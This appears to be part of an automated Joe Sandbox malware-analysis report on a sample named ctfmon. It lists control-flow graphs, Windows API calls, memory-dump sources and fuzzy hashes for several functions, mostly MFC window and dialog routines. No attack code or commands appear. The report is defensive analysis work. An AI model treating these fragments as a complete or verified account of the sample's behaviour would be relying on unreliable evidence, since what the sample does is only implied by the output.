        control_flow_graph 143 404150-40419f VirtualAlloc * 2 144 4041a3-4041aa 143->144 145 4041ac-4041c3 Sleep 144->145 146 40421e-40424d WaitForSingleObject ResetEvent 144->146 147 404215-40421c 145->147 148 4041c5-4041d0 145->148 149 404285-4042c2 call 40dbbf CreateFileW 146->149 150 40424f-404280 SetEvent Sleep 146->150 147->145 147->146 148->147 151 4041d2-404213 call 402f20 148->151 156 4042c8-4042e3 CreateFileW 149->156 157 4043a9-404406 GetFileSize call 40dc10 SetFilePointer ReadFile CloseHandle 149->157 150->144 151->147 156->157 158 4042e9-404392 call 420e3f call 402f20 call 420e68 156->158 163 404408-404429 157->163 164 40442e-4044f9 call 4045e0 SetEvent 157->164 166 404393-4043a4 SetEvent Sleep 158->166 163->166 169 4041a1 164->169 172 4044ff 164->172 166->169 169->144 173 404505-404534 172->173 175 404536 173->175 176 404538-404587 call 402f20 Sleep 173->176 175->176 179 404501 176->179 180 40458d 176->180 179->173 180->169
        APIs
        • VirtualAlloc.KERNEL32(00000000,0007A120,00001000,00000004), ref: 0040416F
        • VirtualAlloc.KERNEL32(00000000,00080000,00001000,00000004), ref: 00404182
        • Sleep.KERNEL32(00001388), ref: 004041B1
        • WaitForSingleObject.KERNEL32(00000334,00007530), ref: 0040422D
        • ResetEvent.KERNEL32(00000334), ref: 0040423A
        • SetEvent.KERNEL32(00000334), ref: 0040426F
        • Sleep.KERNEL32(000003E8), ref: 0040427A
        • CreateFileW.KERNEL32(0053CDF8,10000000,00000003,00000000,00000003,00000000,00000000), ref: 004042BB
        • CreateFileW.KERNEL32(0053CDF8,10000000,00000001,00000000,00000003,00000000,00000000), ref: 004042DC
          • Part of subcall function 00402F20: WaitForSingleObject.KERNEL32(00000338,000000FF,?,?,0053CB68,00403D13,?,00000049), ref: 00402F3E
          • Part of subcall function 00402F20: ResetEvent.KERNEL32(00000338,?,0053CB68,00403D13,?,00000049), ref: 00402F47
          • Part of subcall function 00402F20: SetEvent.KERNEL32(0000033C,?,0053CB68,00403D13,?,00000049), ref: 00402F77
          • Part of subcall function 00402F20: WaitForSingleObject.KERNEL32(0000033C,00000064,?,0053CB68,00403D13,?,00000049), ref: 00402F88
          • Part of subcall function 00402F20: Sleep.KERNEL32(0000000A,?,0053CB68,00403D13,?,00000049), ref: 00402F93
          • Part of subcall function 00402F20: SetEvent.KERNEL32(00000338,?,0053CB68,00403D13,?,00000049), ref: 00402F9E
        • SetEvent.KERNEL32(00000334), ref: 00404393
        • Sleep.KERNEL32(000003E8), ref: 0040439E
        • GetFileSize.KERNEL32(00000000,?), ref: 004043AF
        • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,0007A120,00000000), ref: 004043DE
        • ReadFile.KERNEL32(00000000,?,0007A120,?,00000000), ref: 004043F5
        • CloseHandle.KERNEL32(00000000), ref: 004043FC
        • SetEvent.KERNEL32 ref: 004044ED
        • Sleep.KERNEL32(000000C8,?,00000334), ref: 0040457D
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Event$FileSleep$ObjectSingleWait$AllocCreateResetVirtual$CloseHandlePointerReadSize
        • String ID: +*&=^^^^--------DW+ER$+*&=^^^^--------DW+FI$+*&=^^^^--------DWRST
        • API String ID: 72173714-2046355071
        • Opcode ID: 03ec659664103a2cae5422131a5bfd8373ece3637d9f973c933879326cef5ca2
        • Instruction ID: 68a225615deaf7f64b5cd94b1301c96557090b2748eeb4ce9f12d3137a3e3624
        • Opcode Fuzzy Hash: 03ec659664103a2cae5422131a5bfd8373ece3637d9f973c933879326cef5ca2
        • Instruction Fuzzy Hash: C1C1AE71A04704AFD714DF24EC84A1BBBE5FBD8700F40492DFA45AB390DB78A909CBA5

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 181 421ef2-421f11 call 428c05 184 421f13-421f25 CallNextHookEx 181->184 185 421f2a-421f48 call 4283ee 181->185 186 421fdd-421fdf 184->186 189 421fe2-422005 call 421c7a 185->189 190 421f4e-421f55 185->190 205 422007-42200b 189->205 206 42207a-42208d call 421d11 SetWindowLongW 189->206 192 421f57-421f59 190->192 193 421fb5-421fca CallNextHookEx 190->193 192->193 197 421f5b-421f69 GetWindowLongW 192->197 194 421fd9-421fdc 193->194 195 421fcc-421fd5 UnhookWindowsHookEx 193->195 194->186 195->194 197->193 198 421f6b-421f7a GetPropW 197->198 198->193 200 421f7c-421f92 SetPropW GetPropW 198->200 200->193 201 421f94-421fa4 GlobalAddAtomW 200->201 202 421fa6 201->202 203 421fab-421faf SetWindowLongW 201->203 202->203 203->193 205->206 208 42200d-422015 205->208 213 42206e-422072 206->213 214 42208f-422094 206->214 210 422077 208->210 211 422017-42201b 208->211 210->206 211->210 212 42201d-422032 call 421a74 211->212 212->210 217 422034-422058 call 421d11 GetWindowLongW 212->217 213->193 214->213 221 42205a-422069 SetWindowLongW 217->221 222 42206b 217->222 221->222 222->213
        APIs
          • Part of subcall function 00428C05: TlsGetValue.KERNEL32(0053F118,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F,?,00000000,?,0041F96C,00000000,00000000,00000000,00000000), ref: 00428C44
        • CallNextHookEx.USER32(?,00000003,?,?), ref: 00421F1F
        • GetWindowLongW.USER32(?,000000FC), ref: 00421F5E
        • GetPropW.USER32(?,AfxOldWndProc423), ref: 00421F72
        • SetPropW.USER32(?,AfxOldWndProc423,00000003), ref: 00421F81
        • GetPropW.USER32(?,AfxOldWndProc423), ref: 00421F89
        • GlobalAddAtomW.KERNEL32(AfxOldWndProc423), ref: 00421F95
        • SetWindowLongW.USER32(?,000000FC,Function_00021E76), ref: 00421FAF
        • CallNextHookEx.USER32(?,00000003,?,?), ref: 00421FBE
        • UnhookWindowsHookEx.USER32(?), ref: 00421FCF
        • GetWindowLongW.USER32(?,000000FC), ref: 0042203F
        • SetWindowLongW.USER32(?,000000FC,00000000), ref: 00422060
        • SetWindowLongW.USER32(?,000000FC,00000000), ref: 00422085
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: LongWindow$HookProp$CallNext$AtomGlobalUnhookValueWindows
        • String ID: AfxOldWndProc423
        • API String ID: 3289694481-1060338832
        • Opcode ID: 4f8fdded97969e7e628b20d6936dbd8aea49f7f8fcba6dacbe31f97343f7c436
        • Instruction ID: 3bbe1058c676c252dc3c84ad706e6ee6a953ffd8e3112ba2f7a94efb76d52b7d
        • Opcode Fuzzy Hash: 4f8fdded97969e7e628b20d6936dbd8aea49f7f8fcba6dacbe31f97343f7c436
        • Instruction Fuzzy Hash: B3518131700124EBCB219F65ED88BAE7B74FF19750F61816AFD159A2A1C7788A01CB98

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 223 4238e8-423903 call 424202 226 423905-423908 223->226 227 42390a-42390e 223->227 228 423942-423955 GetWindowRect 226->228 229 423910-423919 GetParent 227->229 230 42391b-423920 GetWindow 227->230 231 4239e6-423a0d GetParent GetClientRect * 2 MapWindowPoints 228->231 232 42395b-42395d 228->232 233 423926-42392a 229->233 230->233 236 423a13-423a52 231->236 234 423978-423981 232->234 235 42395f-42396d GetWindowLongW 232->235 233->228 237 42392c-42393e SendMessageW 233->237 240 423983-42398a call 405110 234->240 241 4239bd-4239e4 GetWindowRect call 405b9b call 405c06 CopyRect 234->241 238 423976 235->238 239 42396f-423974 235->239 242 423a54-423a57 236->242 243 423a59-423a60 236->243 237->228 244 423940 237->244 238->234 239->234 239->238 254 42398f-4239bb call 405b9b call 405c06 CopyRect * 2 240->254 255 42398c 240->255 241->236 247 423a6a-423a6d 242->247 243->247 248 423a62-423a68 243->248 244->228 251 423a74-423a79 247->251 252 423a6f-423a72 247->252 248->247 256 423a84-423a91 call 424319 251->256 257 423a7b-423a81 251->257 252->256 254->236 255->254 262 423a96-423a9a 256->262 257->256
        APIs
          • Part of subcall function 00424202: GetWindowLongW.USER32(?,000000F0), ref: 0042420E
        • GetParent.USER32(?), ref: 00423913
        • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 00423936
        • GetWindowRect.USER32(?,?), ref: 0042394F
        • GetWindowLongW.USER32(00000000,000000F0), ref: 00423962
        • CopyRect.USER32(?,?), ref: 004239AF
        • CopyRect.USER32(?,?), ref: 004239B9
        • GetWindowRect.USER32(00000000,?), ref: 004239C2
          • Part of subcall function 00405B9B: MonitorFromWindow.USER32(?,?), ref: 00405BB0
          • Part of subcall function 00405C06: GetMonitorInfoW.USER32(?,?), ref: 00405C1D
        • CopyRect.USER32(?,?), ref: 004239DE
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: RectWindow$Copy$LongMonitor$FromInfoMessageParentSend
        • String ID:
        • API String ID: 1450647913-0
        • Opcode ID: 15dfc4db7a0cb69fc378f0b22d4e2ecb498fe7f2055ab953c55b9b74ad9f47fe
        • Instruction ID: ccb8daffb7cbfa52e4fbfdfbb8d48ca0ec0013079dd18dece64f2212521eac76
        • Opcode Fuzzy Hash: 15dfc4db7a0cb69fc378f0b22d4e2ecb498fe7f2055ab953c55b9b74ad9f47fe
        • Instruction Fuzzy Hash: 9151A671B00229AFDB10DFA8EC85EEEB7B9AF44314F544166F501F3280D678EE458B58

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 265 42102b-421048 call 40dec0 268 421055-42107f call 4283ee call 423e7e * 2 265->268 269 42104a-421052 call 4283ee 265->269 278 421081-421091 268->278 279 4210a8-4210ab 268->279 269->268 280 421240-421242 278->280 286 421097-4210a5 278->286 279->280 281 4210b1-4210de call 42522d 279->281 283 421247-421255 280->283 287 421133-421167 call 42507c call 42538c call 425119 call 42510b 281->287 288 4210e0-4210ea GetSystemMetrics 281->288 286->279 292 421175-421188 call 422096 287->292 319 421169-421172 GlobalLock 287->319 291 4210f0-421101 call 40e246 288->291 288->292 300 421103-421114 call 40e246 291->300 301 421129-42112e 291->301 302 42118a-42118c 292->302 303 42118e 292->303 300->301 313 421116-421127 call 40e246 300->313 301->287 305 421130 301->305 304 421191-4211ad CreateDialogIndirectParamW call 424739 302->304 303->304 311 4211b2-4211d7 304->311 305->287 317 4211f4-4211fb call 4220e2 311->317 318 4211d9-4211e7 311->318 313->292 313->301 325 421207-42120a 317->325 326 4211fd-4211ff 317->326 318->317 324 4211e9-4211ec 318->324 319->292 324->317 327 42121e-421221 325->327 328 42120c-421210 325->328 326->325 330 421223-42122f GlobalUnlock GlobalFree 327->330 331 421235-421238 327->331 328->327 329 421212-42121b DestroyWindow 328->329 329->327 330->331 332 421244-421246 331->332 333 42123a-42123e 331->333 332->283 333->280 333->332
        APIs
        • __EH_prolog.LIBCMT ref: 00421030
        • GetSystemMetrics.USER32(0000002A), ref: 004210E2
        • GlobalLock.KERNEL32(?), ref: 0042116C
        • CreateDialogIndirectParamW.USER32(?,?,?,Function_00020E73,00000000), ref: 0042119E
          • Part of subcall function 00424739: InterlockedDecrement.KERNEL32(?), ref: 0042474D
        • DestroyWindow.USER32(00000000,?,?,00000000,?,?), ref: 00421215
        • GlobalUnlock.KERNEL32(?), ref: 00421226
        • GlobalFree.KERNEL32(?), ref: 0042122F
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Global$CreateDecrementDestroyDialogFreeH_prologIndirectInterlockedLockMetricsParamSystemUnlockWindow
        • String ID: Helv$MS Sans Serif$MS Shell Dlg
        • API String ID: 2343056566-2894235370
        • Opcode ID: 55db1a83fbba52e5acfeb541132f7c990a34733976cc85534da73b1da14e8790
        • Instruction ID: 7206d5c3c7dbf20e32f5d3ed2ca5f4a347ebefc87342b6247bb12fda8d74ee15
        • Opcode Fuzzy Hash: 55db1a83fbba52e5acfeb541132f7c990a34733976cc85534da73b1da14e8790
        • Instruction Fuzzy Hash: D7619471B00269DFCF10DFA4E8859BEBBB1BF18304F60046FF501A22A1D7785A51CB59

        Control-flow Graph

        APIs
        • __EH_prolog.LIBCMT ref: 00421D1C
        • GetPropW.USER32(?,AfxOldWndProc423), ref: 00421D34
        • CallWindowProcW.USER32(?,?,00000110,?,00000000), ref: 00421D92
          • Part of subcall function 00421924: GetWindowRect.USER32(?,00421B1C), ref: 00421949
          • Part of subcall function 00421924: GetWindow.USER32(?,00000004), ref: 00421966
        • SetWindowLongW.USER32(?,000000FC,?), ref: 00421DC2
        • RemovePropW.USER32(?,AfxOldWndProc423), ref: 00421DCA
        • GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 00421DD1
        • GlobalDeleteAtom.KERNEL32(00000000), ref: 00421DD8
          • Part of subcall function 00421901: GetWindowRect.USER32(?,?), ref: 0042190D
        • CallWindowProcW.USER32(?,?,?,?,00000000), ref: 00421E2C
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
        • String ID: AfxOldWndProc423
        • API String ID: 2397448395-1060338832
        • Opcode ID: f1274f229b79a40cf399756ccfc4787f1cda9d8cf99687d665b758292b2d2fba
        • Instruction ID: ee617ac9c7a8cbdd772955139c2c3f47372abafb9f4b2e415b0651597c7a1178
        • Opcode Fuzzy Hash: f1274f229b79a40cf399756ccfc4787f1cda9d8cf99687d665b758292b2d2fba
        • Instruction Fuzzy Hash: 1831A572A0012ABBCF119FE5ED49DFF7B78EF55311F40042AF901A2160C7394A21D7A9

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 361 42889e-4288bb EnterCriticalSection 362 4288ca-4288cf 361->362 363 4288bd-4288c4 361->363 365 4288d1-4288d4 362->365 366 4288ec-4288f5 362->366 363->362 364 428983-428986 363->364 367 428988-42898b 364->367 368 42898e-4289af LeaveCriticalSection 364->368 369 4288d7-4288da 365->369 370 4288f7-428908 GlobalAlloc 366->370 371 42890a-428926 GlobalHandle GlobalUnlock GlobalReAlloc 366->371 367->368 372 4288e4-4288e6 369->372 373 4288dc-4288e2 369->373 374 42892c-428938 370->374 371->374 372->364 372->366 373->369 373->372 375 428955-428982 GlobalLock call 40e000 374->375 376 42893a-428950 GlobalHandle GlobalLock LeaveCriticalSection call 41fa5f 374->376 375->364 376->375
        APIs
        • EnterCriticalSection.KERNEL32(0053F134,0053EDA8,00000000,?,0053F118,0053F118,00428C39,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F,?,00000000), ref: 004288AD
        • GlobalAlloc.KERNEL32(00002002,00000000,?,?,0053F118,0053F118,00428C39,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F,?,00000000), ref: 00428902
        • GlobalHandle.KERNEL32(0056B508), ref: 0042890B
        • GlobalUnlock.KERNEL32(00000000), ref: 00428914
        • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 00428926
        • GlobalHandle.KERNEL32(0056B508), ref: 0042893D
        • GlobalLock.KERNEL32(00000000), ref: 00428944
        • LeaveCriticalSection.KERNEL32(0040D108,?,?,0053F118,0053F118,00428C39,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F,?,00000000), ref: 0042894A
        • GlobalLock.KERNEL32(00000000), ref: 00428959
        • LeaveCriticalSection.KERNEL32(?), ref: 004289A2
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
        • String ID:
        • API String ID: 2667261700-0
        • Opcode ID: 94baa74e74d1816e201a8b95c87ab1cee1c36e3339597553a40441d4cb95e4e8
        • Instruction ID: 271864d7abaf63b675c0f0faa4b004931e40b10b77f41b95d7dd058722d16705
        • Opcode Fuzzy Hash: 94baa74e74d1816e201a8b95c87ab1cee1c36e3339597553a40441d4cb95e4e8
        • Instruction Fuzzy Hash: 1E318EB17007099FD7249F28EC89A2EB7E9FF44304B440A2EF952C3661EB75E855CB54

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 380 42131a-421347 call 40dec0 call 4283ee 385 421367-421369 380->385 386 421349-421365 call 4283ee FindResourceW LoadResource 380->386 388 421375-421379 385->388 389 42136b-421372 LockResource 385->389 386->385 391 421383-42139a call 42129e call 4220e2 388->391 392 42137b-42137e 388->392 389->388 398 4213ba-4213d9 call 422096 call 421c35 call 42102b 391->398 399 42139c-4213a7 IsWindowEnabled 391->399 393 42146b-421479 392->393 407 4213db-4213df 398->407 408 42142d-421434 398->408 399->398 400 4213a9-4213b3 EnableWindow 399->400 400->398 411 4213e1-4213ee call 424202 407->411 412 4213fb-4213fe 407->412 409 421441-421444 408->409 410 421436-42143b EnableWindow 408->410 414 421446-42144f GetActiveWindow 409->414 415 42145a-421468 call 4212d8 409->415 410->409 422 4213f3-4213f6 call 423c3c 411->422 423 4213f0-4213f2 411->423 412->408 413 421400-421411 call 424319 412->413 413->408 414->415 418 421451-421454 SetActiveWindow 414->418 415->393 418->415 422->412 423->422
        APIs
        • __EH_prolog.LIBCMT ref: 0042131F
        • FindResourceW.KERNEL32(?,00000000,00000005,?,?,?,?,?,?,?,?,00000000), ref: 00421357
        • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0042135F
          • Part of subcall function 004220E2: UnhookWindowsHookEx.USER32(?), ref: 00422107
        • LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0042136C
        • IsWindowEnabled.USER32(?), ref: 0042139F
        • EnableWindow.USER32(?,00000000), ref: 004213AD
        • EnableWindow.USER32(?,00000001), ref: 0042143B
        • GetActiveWindow.USER32 ref: 00421446
        • SetActiveWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00421454
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$Resource$ActiveEnable$EnabledFindH_prologHookLoadLockUnhookWindows
        • String ID:
        • API String ID: 401145483-0
        • Opcode ID: ee2693152e6010e6e9c47a675b8d66676a5692f735b3e3edcbf4436643e90683
        • Instruction ID: 784f444dc76e6990419508fd16e063a3552bb93fd24097b854aee613197a0977
        • Opcode Fuzzy Hash: ee2693152e6010e6e9c47a675b8d66676a5692f735b3e3edcbf4436643e90683
        • Instruction Fuzzy Hash: 9B41C030B00A24DBDB21AB65E885A7FB7B5FF54705F90011BF902A22A1CB798941CA69

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 427 423c3c-423c57 428 423c69 427->428 429 423c59-423c67 call 424202 427->429 431 423c6d-423c8b GetParent call 4203c0 428->431 429->428 429->431 435 423c8e-423c92 431->435 436 423c94-423ca1 PeekMessageW 435->436 437 423d0a-423d18 call 4203c0 435->437 436->437 439 423ca3-423ca7 436->439 452 423d1a-423d1e 437->452 453 423d7f-423d88 call 42ad92 437->453 441 423cbb-423cc0 439->441 442 423ca9-423cb7 call 424368 UpdateWindow 439->442 444 423cc2-423cc6 441->444 445 423ce1-423ce6 441->445 442->441 444->445 450 423cc8-423ccc 444->450 446 423d04-423d08 445->446 447 423ce8-423d02 SendMessageW 445->447 446->435 447->435 447->446 450->445 451 423cce-423cdb SendMessageW 450->451 451->445 454 423d43-423d4c 452->454 455 423d20-423d28 452->455 462 423d91-423d98 453->462 463 423d8a-423d8e 454->463 464 423d4e-423d5d call 4203c0 454->464 457 423d31-423d3f call 424368 UpdateWindow 455->457 458 423d2a-423d2f 455->458 457->454 458->454 458->457 463->462 469 423d6b-423d78 PeekMessageW 464->469 470 423d5f-423d67 464->470 469->437 471 423d7a 469->471 470->469 471->435
        APIs
        • GetParent.USER32(?), ref: 00423C70
        • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00423C99
        • UpdateWindow.USER32(?), ref: 00423CB5
        • SendMessageW.USER32(?,00000121,00000000,?), ref: 00423CDB
        • SendMessageW.USER32(?,0000036A,00000000,00000001), ref: 00423CFA
        • UpdateWindow.USER32(?), ref: 00423D3D
        • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00423D70
          • Part of subcall function 00424202: GetWindowLongW.USER32(?,000000F0), ref: 0042420E
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Message$Window$PeekSendUpdate$LongParent
        • String ID:
        • API String ID: 2853195852-0
        • Opcode ID: 695136d32d4e6256ec9fe47706e3780479ec0c08abf10bb3384cb61ea45ff5e8
        • Instruction ID: 2835e03b91a28ba3af01524857fe71f7bc2e9977fd44adc23a2fdb3f1163188a
        • Opcode Fuzzy Hash: 695136d32d4e6256ec9fe47706e3780479ec0c08abf10bb3384cb61ea45ff5e8
        • Instruction Fuzzy Hash: BE418F307047519BD731DF26A848A2BBBF8EFC4B46F90091EF48196251C77DDA05CA9A

        Control-flow Graph

        APIs
        • GetSystemMenu.USER32(?,00000000,?,?,?,?,0042AFB8,000000FF), ref: 00401265
        • AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 004012B3
        • AppendMenuW.USER32(?,00000000,00000010,?), ref: 004012C2
        • SendMessageW.USER32(?,00000080,00000001,?), ref: 004012EB
        • SendMessageW.USER32(?,00000080,00000000,?), ref: 004012FC
        • CreateThread.KERNEL32(00000000,00000000,Function_000014B0,00000000,00000000,00000000), ref: 0040133B
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Menu$AppendMessageSend$CreateSystemThread
        • String ID:
        • API String ID: 74173811-0
        • Opcode ID: d8992fad20af1a923786e3dc5bba175c898580a51614293c88c1d127db3c23c6
        • Instruction ID: 1d9806d43d84ee879c0bed757a7013bebe0408e528fbc722d7d59c404b59acd4
        • Opcode Fuzzy Hash: d8992fad20af1a923786e3dc5bba175c898580a51614293c88c1d127db3c23c6
        • Instruction Fuzzy Hash: E0215375340700BBE230DB55DC82F1AF7A4EB84B10F508A1EB6556B2D0CAB8F8058B59

        Control-flow Graph

        APIs
        • KiUserCallbackDispatcher.NTDLL(0000000B), ref: 00424DA5
        • GetSystemMetrics.USER32(0000000C), ref: 00424DAC
        • GetDC.USER32(00000000), ref: 00424DC5
        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00424DD6
        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00424DDE
        • ReleaseDC.USER32(00000000,00000000), ref: 00424DE6
          • Part of subcall function 00428FF4: GetSystemMetrics.USER32(00000002), ref: 00429006
          • Part of subcall function 00428FF4: GetSystemMetrics.USER32(00000003), ref: 00429010
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
